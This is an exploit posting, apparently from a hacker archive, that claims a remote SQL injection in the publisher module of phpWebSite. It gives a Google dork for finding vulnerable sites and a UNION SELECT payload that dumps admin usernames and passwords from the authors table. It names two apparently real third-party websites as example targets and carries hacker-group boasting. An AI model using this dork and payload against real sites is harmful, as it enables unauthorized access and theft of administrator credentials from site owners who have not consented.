################################ IRANIAN THE BEST HACKERS IN THE WORLD ################## #################### #################### ## ## Remote SQL injection Vulnerability ## ## phpWebSite (publisher) ## ############################################################### ############################################################### ############################################################### ############################################################### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email : Ehsan_Hp200@Hotmail.com ## ## Persian Gulf 4 Ever! ############################# ############################# ############################# ############################# ############################# ## ## Dork : allinurl:"mod.php?mod=publisher" Exploite: www.victim.com/mod.php?mod=publisher&op=allmedia&artid=-1 union select concat(aid,0x3a,pwd) from authors Example : http://www.e-iklanbaris.com/mod.php?mod=publisher&op=allmedia&artid=-1 union select concat(aid,0x3a,pwd) from authors Exploite 2 : www.victim.com/mod.php?mod=publisher&op=allmedia&artid=-1 union select concat(aid,0x3a,pwd) from authors Example : http://www.bulutangkis.com/mod.php?mod=publisher&op=allmedia&artid=-1 union select concat(aid,0x3a,pwd) from authors ######################################################################################### SpeCial TanX To : Skote_Vahshat ########################################################################################## ############################### IRANIAN THE BEST HACKERS IN THE WORLD ##################